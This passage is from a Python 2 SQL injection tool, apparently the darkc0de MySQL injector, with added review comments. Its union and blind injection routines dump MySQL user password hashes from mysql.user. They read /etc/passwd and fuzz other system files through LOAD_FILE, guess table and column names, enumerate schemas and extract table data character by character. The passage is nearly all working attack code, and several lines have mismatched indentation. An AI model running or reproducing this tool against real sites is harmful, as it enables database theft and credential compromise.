        match = re.findall("darkc0de",source)
        if len(match) >= 1:
                yesno = "YES <-- w00t w00t"
        else:
                yesno = "NO"
        print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
        # The display string doubles as the boolean for the branch below.
        if yesno == "YES <-- w00t w00t":
                print "\n[+] Dumping MySQL user info. host:user:password";file.write("\n\n[+] Dumping MySQL user info. host:user:password")
                # Row count first: strip("\x1e") then split() leaves [COUNT, ...].
                # If the marker is absent, match[0] raises IndexError (uncaught here).
                head_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+mysql.user"+arg_end
                source = GetThatShit(head_URL)
                match = re.findall("\x1e\x1e\S+",source);match = match[0].strip("\x1e").split("\x1e");userend = match[0]
                print "[+] Number of users in the mysql.user table:",userend;file.write("[+] Number of users in the mysql.user table: "+str(userend))
                # "NUM" is a plain-text placeholder replaced by the row index per request.
                head_URL = site.replace("darkc0de","concat(0x1e,0x1e,host,0x1e,user,0x1e,password,0x1e,0x20)")
                head_URL = head_URL+"+FROM+mysql.user+LIMIT+NUM,1"+arg_end
                for x in range(0,int(userend)):
                        try:
                                source = GetThatShit(head_URL.replace("NUM",str(x)))
                                match = re.findall("\x1e\x1e\S+",source)
                                match = match[0].strip("\x1e").split("\x1e")
                                if len(match) != 3:
                                        # NOTE(review): list += str extends the list with the four
                                        # characters 'N','U','L','L', so a short row shows "N" in
                                        # the missing slot rather than the intended "NULL".
                                        nullvar = "NULL"
                                        match += nullvar
                                print "\t["+str(x)+"]",match[0]+":"+match[1]+":"+match[2];file.write("\n["+str(x)+"] "+str(match[0])+":"+str(match[1])+":"+str(match[2]))
                        except (KeyboardInterrupt, SystemExit):
                                raise
                        except:
                                # Any other failure (no marker in the page, short row, network
                                # error) silently drops this row.
                                pass
        else:
                print "\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!"
                file.write("\n\n[-] MySQL user enumeration has been skipped!\n[-] We do not have access to mysql DB on this target!")
        # 0x2f6574632f706173737764 is '/etc/passwd'; 0x3a is ':'.
        head_URL = site.replace("darkc0de","concat(load_file(0x2f6574632f706173737764),0x3a,0x6461726b63306465)")+arg_end
        source = GetThatShit(head_URL)
        match = re.findall("darkc0de",source)
        if len(match) >= 1:
                yesno = "YES <-- w00t w00t"
        else:
                yesno = "NO"
        print "\n[+] Do we have Access to Load_File:",yesno;file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno))
        if yesno == "YES <-- w00t w00t":
                # The wordlist handle is never closed explicitly; CPython releases it
                # when the refcount drops.
                fuzz_load = open(loadfilefuzz, "r").readlines()
                # Same file through a quoted literal; presumably the marker only comes
                # back when the quotes reach the server unescaped.
                head_URL = site.replace("darkc0de","concat(load_file('%2Fetc%2Fpasswd'),0x3a,0x6461726b63306465)")+arg_end
                source = GetThatShit(head_URL)
                match = re.findall("darkc0de",source)
                # NOTE(review): this test requires more than one marker hit (> 1)
                # while every other probe accepts one (>= 1); the reason is not
                # recoverable from this chunk.
                if len(match) > 1:
                        onoff = "OFF <-- w00t w00t"
                else:
                        onoff = "ON"       
                print "\n[+] Magic quotes are:",onoff
                yesno = str(raw_input("\n[!] Would You like to fuzz LOAD_FILE (Yes/No): "))
                if yesno == "Y" or yesno == "y" or yesno == "Yes" or yesno == "yes":
                        print "\n[+] Starting Load_File Fuzzer...";file.write("\n\n[+] Starting Load_File Fuzzer...")
                        # NOTE(review): the log text says "tables names" where the console
                        # says "system files" (copied from the --fuzz block); it is output
                        # text, so it is left untouched here.
                        print "[+] Number of system files to be fuzzed:",len(fuzz_load),"\n";file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_load))+"\n")
                        for sysfile in fuzz_load:
                                sysfile = sysfile.rstrip("\n")
                                # With a proxy configured, '/' and '.' are percent-encoded by hand.
                                if proxy != "None":
                                        sysfile = sysfile.replace("/","%2F")
                                        sysfile = sysfile.replace(".","%2E")
                                # Quoted path when quotes pass through; hex literal otherwise.
                                if onoff == "OFF <-- w00t w00t":
                                        head_URL = site.replace("darkc0de","concat(LOAD_FILE(\'"+sysfile+"\'),0x3a,0x6461726b63306465)")+arg_end
                                else:
                                        head_URL = site.replace("darkc0de","concat(LOAD_FILE(0x"+sysfile.encode("hex")+"),0x3a,0x6461726b63306465)")+arg_end
                                source = GetThatShit(head_URL)
                                match = re.findall("darkc0de",source)
                                if len(match) > 0:
                                    print "[!] Found",sysfile;file.write("\n[!] Found "+sysfile)
                                    # Strip the concat(...) wrapper so the printed URL is the bare
                                    # LOAD_FILE() request (this inner block is indented by 4, not 8).
                                    head_URL = head_URL.replace("concat(","")
                                    head_URL = head_URL.replace(",0x3a,0x6461726b63306465)","")
                                    print "[!]",head_URL;file.write("\n[!] "+head_URL)
        else:
                print "\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!"
                file.write("\n\n[-] Load_File Fuzzer has been by skipped!\n[-] Load_File disabled on this target!")        
  684.  
#Fuzz table/columns
# Wordlist-driven guessing of table names, then of column names inside each
# table that answered. Union mode selects the hex marker FROM the candidate
# table and looks for it in the page; blind mode looks for arg_string (the
# caller-supplied "true page" pattern). The placeholders "TABLE" and "COLUMN"
# are replaced textually per candidate.
# `tablefuzz`, `columnfuzz`, `arg_string`, `arg_end` and `GetThatShit` are
# defined above this chunk.
if mode == "--fuzz":
        # Both wordlist handles are left for CPython's refcounting to close.
        fuzz_tables = open(tablefuzz, "r").readlines()
        fuzz_columns = open(columnfuzz, "r").readlines()
        print "[+] Beginning table and column fuzzer...";file.write("[+] Beginning table and column fuzzer...")
        print "[+] Number of tables names to be fuzzed:",len(fuzz_tables);file.write("\n[+] Number of tables names to be fuzzed: "+str(len(fuzz_tables)))
        print "[+] Number of column names to be fuzzed:",len(fuzz_columns);file.write("\n[+] Number of column names to be fuzzed: "+str(len(fuzz_columns)))
        print "[+] Searching for tables and columns...";file.write("\n[+] Searching for tables and columns...")
        if arg_blind == "--blind":
                fuzz_URL = site+"+and+(SELECT+1+from+TABLE+limit+0,1)=1"
        else:
                fuzz_URL = site.replace("darkc0de","0x"+"darkc0de".encode("hex"))+"+FROM+TABLE"+arg_end
        for table in fuzz_tables:
                table = table.rstrip("\n")
                table_URL = fuzz_URL.replace("TABLE",table)
                source = GetThatShit(table_URL)
                if arg_blind == "--blind":
                        match = re.findall(arg_string,source)
                else:
                        match = re.findall("darkc0de", source);
                if len(match) > 0:
                        print "\n[!] Found a table called:",table;file.write("\n\n[+] Found a table called: "+str(table))
                        print "\n[+] Now searching for columns inside table \""+table+"\"";file.write("\n\n[+] Now searching for columns inside table \""+str(table)+"\"")
                        # Blind: substring(concat(1,COLUMN),1,1) yields "1" only when
                        # COLUMN resolves; in union mode the table_URL from above is reused.
                        if arg_blind == "--blind":
                                table_URL = site+"+and+(SELECT+substring(concat(1,COLUMN),1,1)+from+"+table+"+limit+0,1)=1"
                        for column in fuzz_columns:
                                column = column.rstrip("\n")
                                if arg_blind == "--blind":
                                        column_URL = table_URL.replace("COLUMN",column)
                                else:
                                        # Union: the marker select is extended with the candidate
                                        # column; presumably an unknown column makes the query fail
                                        # so the marker is not echoed.
                                        column_URL = table_URL.replace("0x6461726b63306465","concat(0x6461726b63306465,0x3a,"+column+")")
                                source = GetThatShit(column_URL)
                                if arg_blind == "--blind":
                                        match = re.findall(arg_string,source)    
                                else:
                                        match = re.findall("darkc0de",source)
                                if len(match) > 0:
                                        print "[!] Found a column called:",column;file.write("\n[!] Found a column called:"+column)
                        print "[-] Done searching inside table \""+table+"\" for columns!";file.write("\n[-] Done searching inside table \""+str(table)+"\" for columns!")
  724.  
#Build URLS for each different mode
# Builds count_URL (how many rows to expect) and line_URL (one row per
# request) for the --schema / --dump / --full / --dbs modes, and sets arg_row,
# the label used when the count is printed. Union variants use the
# 0x1e/0x20 framing; blind variants build the "ascii(substring((SELECT ...)"
# prefix that the per-row/per-character loop further down completes.
# Schema and table names are hex-encoded so no quote characters travel in
# the request. `arg_database`, `arg_table`, `arg_columns`, `arg_where`,
# `arg_orderby` and `version` are set above this chunk.
if mode == "--schema":
    # Database given, no table: its tables (blind) or table:column rows (union).
    if arg_database != "None" and arg_table == "None":
                if arg_blind == "--blind":
                        print "[+] Showing Tables from database \""+arg_database+"\"";file.write("\n[+] Showing Tables from database \""+arg_database+"\"")
                        count_URL = site+"+and+((SELECT+COUNT(table_name)"
                        count_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex")+"))"
                        line_URL = site+"+and+ascii(substring((SELECT+table_name"
                        line_URL += "+FROM+information_schema.TABLES+WHERE+table_schema=0x"+arg_database.encode("hex")
                else:
                        print "[+] Showing Tables & Columns from database \""+arg_database+"\""
                        file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"")
                        line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
                        line_URL += "+FROM+information_schema.columns+WHERE+table_schema=0x"+arg_database.encode("hex")
                        # The count is taken over TABLES while the rows come from COLUMNS;
                        # the union loop below stops on a new table, which is why that works.
                        count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(table_schema),0x1e,0x20)")
                        count_URL += "+FROM+information_schema.tables+WHERE+table_schema=0x"+arg_database.encode("hex")
                arg_row = "Tables"
        # Database and table given: that table's columns.
        if arg_database != "None" and arg_table != "None":
                if arg_blind == "--blind":
                        print "[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\""
                        file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
                        count_URL = site+"+and+((SELECT+COUNT(column_name)"
                        count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")+"))"
                        line_URL = site+"+and+ascii(substring((SELECT+column_name"
                        line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
                else:
                        print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\""
                        file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
                        line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
                        line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
                        count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
                        count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema=0x"+arg_database.encode("hex")+"+AND+table_name+=+0x"+arg_table.encode("hex")
        # NOTE(review): as rendered here this line sits at the level of the `if`
        # above rather than inside it, so it overrides the "Tables" label set
        # earlier whenever the file's tab/space mix is read that way.
        arg_row = "Columns"

elif mode == "--dump":                
    print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\""
    file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"")
        print "[+] and Column(s) "+str(arg_columns);file.write("\n[+] Column(s) "+str(arg_columns))
        if arg_blind == "--blind":
                # Columns joined with 0x3a (':') so a whole row reads as one string.
                darkc0de = ""
                for column in arg_columns:
                        darkc0de += column+",0x3a,"
                # NOTE(review): rstrip() takes a character set, not a suffix, so any
                # trailing '0', 'x', '3', 'a' or ',' of the last column name is
                # removed as well.
                darkc0de = darkc0de.rstrip("0x3a,")
                count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"+arg_database+"."+arg_table
                line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+"+arg_database+"."+arg_table
        else:
                # NOTE(review): `darkc0de` is not initialised in this branch; it must
                # already exist above this chunk (with the opening concat(...) prefix)
                # or this raises NameError.
                for column in arg_columns:
                        darkc0de += column+",0x1e,"
                count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table
                line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_database+"."+arg_table
        if arg_where != "" or arg_orderby != "":
                if arg_where != "":
                        # "col,value" becomes WHERE+col=0x<hex(value)>.
                        arg_where = arg_where.split(",")
                        print "[+] WHERE clause:","\""+arg_where[0]+"="+arg_where[1]+"\""
                        arg_where = "WHERE+"+arg_where[0]+"="+"0x"+arg_where[1].encode("hex")
                if arg_orderby != "":
                        arg_orderby = "ORDER+BY+'"+arg_orderby+"'"
                        print "[+] ORDERBY clause:",arg_orderby
                count_URL += "+"+arg_where
                line_URL += "+"+arg_where+"+"+arg_orderby
        # NOTE(review): `version` is a string (see the version check above), so
        # comparing its first character with the int 4 is always False in
        # Python 2 and this fallback never runs. The two lines below are also
        # indented differently from each other as rendered.
        if version[0] == 4:
                count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")+"+FROM+"+arg_table
            line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)")+"+FROM+"+arg_table

elif mode == "--full":
    # Every schema:table:column row except information_schema itself; union only
    # (the blind loop below does not list --full). Note the 4-space / 8-space
    # indentation mix on these four lines as rendered.
    print "[+] Starting full SQLi information_schema enumeration..."
    line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
    line_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex")
        count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
        count_URL += "+FROM+information_schema.columns+WHERE+table_schema!=0x"+"information_schema".encode("hex")

elif mode == "--dbs":
    # All schema names except information_schema.
    print "[+] Showing all databases current user has access too!"
    file.write("\n[+] Showing all databases current user has access too!")
        if arg_blind == "--blind":
                count_URL = site+"+and+((SELECT+COUNT(schema_name)"
                count_URL += "+FROM+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")+"))"
                line_URL = site+"+and+ascii(substring((SELECT+schema_name"
                line_URL += "+from+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")
        else:
                count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
                count_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex")
                line_URL = site.replace("darkc0de","concat(0x1e,0x1e,schema_name,0x1e,0x20)")
                line_URL += "+FROM+information_schema.schemata+WHERE+schema_name!=0x"+"information_schema".encode("hex")
    arg_row = "Databases"
  810.  
# Common suffixes for the URLs built above. Blind: close the two parentheses
# the count query left open and leave line_URL ending in "+LIMIT+" for the
# per-row / per-character loop to complete. Union: add the "NUM" row
# placeholder (replaced per request) plus arg_end.
# NOTE(review): in --info and --fuzz modes neither URL is built above, so
# these lines rely on both names already existing earlier in the file.
if arg_blind == "--blind":
        count_URL+="))"
        line_URL+="+LIMIT+"
else:
        count_URL += arg_end
        line_URL += "+LIMIT+NUM,1"+arg_end
  817.        
## Blind Info (the author acknowledges this block is oddly placed)
# Blind-mode counterpart of --info: one true/false probe on mysql.user, then a
# line_URL that exposes version():user():database() as a single ':'-joined
# string for the character-by-character loop further down. row_value = 1
# tells that loop there is exactly one row to read.
if mode == "--info" and arg_blind == "--blind":
        head_URL = site+"+and+(SELECT+1+from+mysql.user+limit+0,1)=1"
        source = GetThatShit(head_URL)
        match = re.findall(arg_string,source)
        if len(match) >= 1:
                yesno = "YES <-- w00t w00t\n[!] Retrieve Info: --dump -D mysql -T user -C user,password"
        else:
                yesno = "NO"
        print "\n[+] Do we have Access to MySQL Database:",yesno;file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
        print "\n[+] Showing database version, username@location, and database name!"
    # NOTE(review): the next two lines are rendered with a 4-space indent
    # (tab/space mix); they must be read as part of this block for the later
    # loop to have a line_URL.
    file.write("\n\n[+] Showing database version, username@location, and database name!")
    line_URL = site+"+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),"
        row_value = 1
  832.  
#Lets Count how many rows or columns
# Fetch the expected row count so the extraction loops below know when to stop.
# Blind: GuessValue(count_URL) (defined above this chunk) supplies the number.
# Union: parse the 0x1e-framed COUNT out of the page; [2:] drops the two
# leading 0x1e bytes so split() gives [COUNT, ...]. If no framed value is in
# the page, match[0] raises IndexError and the script aborts. row_value is a
# string in the union branch; the loop below int()s it.
if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full":
        if arg_blind == "--blind":
                row_value = GuessValue(count_URL)
        else:
                source = GetThatShit(count_URL)
                match = re.findall("\x1e\x1e\S+",source)
                match = match[0][2:].split("\x1e")
                row_value = match[0]
        print "[+] Number of "+arg_row+": "+str(row_value);file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n")
  843.  
## UNION Schema Enumeration and DataExt loop
# One request per row: "NUM" in line_URL is replaced by the running index
# `num`, and the 0x1e-framed result is split into fields. The loop ends when
# table_num reaches row_value, or (break below) when a page carries no framed
# value at all. `num`, `table_num`, `cur_db`, `cur_table` and `arg_rowdisp`
# are initialised above this chunk.
# NOTE(review): num+=1 is the last statement inside the try; an exception
# raised before it (e.g. IndexError on a short --schema row) is swallowed by
# the bare except and the same row is requested again, so the loop appears
# unable to advance past such a row except via Ctrl-C.
if arg_blind == "--union":
        if mode == "--schema" or mode == "--dump" or mode == "--dbs" or mode == "--full":
                while int(table_num) != int(row_value):
                        try:
                                source = GetThatShit(line_URL.replace("NUM",str(num)))
                                match = re.findall("\x1e\x1e\S+",source)
                                if len(match) >= 1:
                                        if mode == "--schema" or mode == "--full":
                                                # [2:] drops the two leading 0x1e bytes -> [schema, table, column, ...]
                                                match = match[0][2:].split("\x1e")
                                                # New database: print a header; table_num==0 means first output.
                                                if cur_db != match[0]:         
                                                        cur_db = match[0]
                                                        if table_num == 0:
                                                                print "\n[Database]: "+match[0];file.write("\n[Database]: "+match[0]+"\n")
                                                        else:
                                                                print "\n\n[Database]: "+match[0];file.write("\n\n[Database]: "+match[0]+"\n")
                                                        print "[Table: Columns]";file.write("[Table: Columns]\n")
                                                # New table: start a "[n]table: col" line and count it;
                                                # same table: append ",col" to the current line.
                                                if cur_table != match[1]:
                                                        print "\n["+str(table_num+1)+"]"+match[1]+": "+match[2],
                                                        file.write("\n["+str(table_num+1)+"]"+match[1]+": "+match[2])
                                                        cur_table = match[1]
                                                        table_num = int(table_num) + 1
                                                else:
                                                        sys.stdout.write(",%s" % (match[2]))
                                                        file.write(","+match[2])
                                                        sys.stdout.flush()
                                        #Gathering Databases only
                                        elif mode == "--dbs":                                        
                                                # The whole regex match is printed, including its two
                                                # leading 0x1e control bytes (nothing strips them here).
                                                match = match[0]
                                                if table_num == 0:
                                                        print "\n["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match))
                                                else:
                                                        print "["+str(num+1)+"]",match;file.write("\n["+str(num+1)+"]"+str(match))
                                                table_num+=1
                                        #Collect data from tables & columns
                                        elif mode == "--dump":
                                                # Re-match with a regex that tolerates whitespace inside the
                                                # row (greedy .+ between the 0x1e pairs); empty cells become
                                                # "NoDataInColumn" when printed.
                                                match = re.findall("\x1e\x1e+.+\x1e\x1e",source)
                                                if match == []:
                                                        match = ['']
                                                else:
                                                        match = match[0].strip("\x1e").split("\x1e")
                                                if arg_rowdisp == 1:
                                                        print "\n["+str(num+1)+"] ",;file.write("\n["+str(num+1)+"] ",)
                                                else:
                                                        print;file.write("\n")
                                                for ddata in match:
                                                        if ddata == "":
                                                                ddata = "NoDataInColumn"
                                                        sys.stdout.write("%s:" % (ddata))
                                                        file.write("%s:" % ddata)
                                                        sys.stdout.flush()
                                                table_num+=1
                                else:
                                        # No framed value in the page: count the row as empty for
                                        # --dump, then stop the whole loop.
                                        if mode == "--dump":
                                                table_num+=1
                                                sys.stdout.write("\n[%s] No data" % (num))
                                                file.write("\n[%s] No data" % (num))
                                        break
                                num+=1
                        except (KeyboardInterrupt, SystemExit):
                                raise
                        except:
                                # Everything else is swallowed; see the note above the loop.
                                pass
  908.  
## Blind Schema Enumeration and DataExt loop
# Character-by-character extraction: for each row (lim_num) and each character
# position (let_pos) a Guess_URL is built from line_URL and GuessValue
# (defined above this chunk) returns the character code; a returned 0 ends the
# row. --info uses a single-string line_URL so only let_pos is substituted.
# `num`, `lim_num` and `let_pos` are initialised above this chunk; row_value
# must be an int here (1 for --info, otherwise whatever GuessValue returned).
# Note --full is not listed: it is union-only.
if arg_blind == "--blind":
        if mode == "--schema" or mode == "--dbs" or mode == "--dump" or mode == "--info":
                # lower_bound is never read in this block; upper_bound only seeds
                # `value` so the while loop runs at least once.
                lower_bound = 0
                upper_bound = 127
                print
                for data_row in range(int(num), row_value):
                        sys.stdout.write("[%s]: " % (lim_num))
                        file.write("\n[%s]: " % (lim_num))
                        sys.stdout.flush()
                        value = chr(upper_bound)
                        while value != chr(0):
                                if mode == "--info":
                                        Guess_URL = line_URL + str(let_pos)+",1))"
                                else:
                                        Guess_URL = line_URL + str(lim_num) +",1),"+str(let_pos)+",1))"
                                value = chr(GuessValue(Guess_URL))
                                sys.stdout.write("%s" % (value))
                                file.write(value)
                                sys.stdout.flush()
                                let_pos+=1
                        print
                        lim_num = int(lim_num) + 1
                        let_pos = 1
                        # Has no effect on the range() iteration; data_row is rebound each pass.
                        data_row+=1
  934.  
#Lets wrap it up!
# Final summary: a locale-formatted timestamp, the total request count `gets`
# (maintained above this chunk, presumably by GetThatShit), and the log path
# `logfile`; then the log handle is closed.
if mode == "--schema" or mode == "--full" or mode == "--dump":
        print "\n\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X"))
else:
        print "\n[-] %s" % time.strftime("%X");file.write("\n\n[-] [%s]" % time.strftime("%X"))
print "[-] Total URL Requests:",gets;file.write("\n[-] Total URL Requests: "+str(gets))
print "[-] Done\n";file.write("\n[-] Done\n")
print "Don't forget to check", logfile,"\n"
file.close()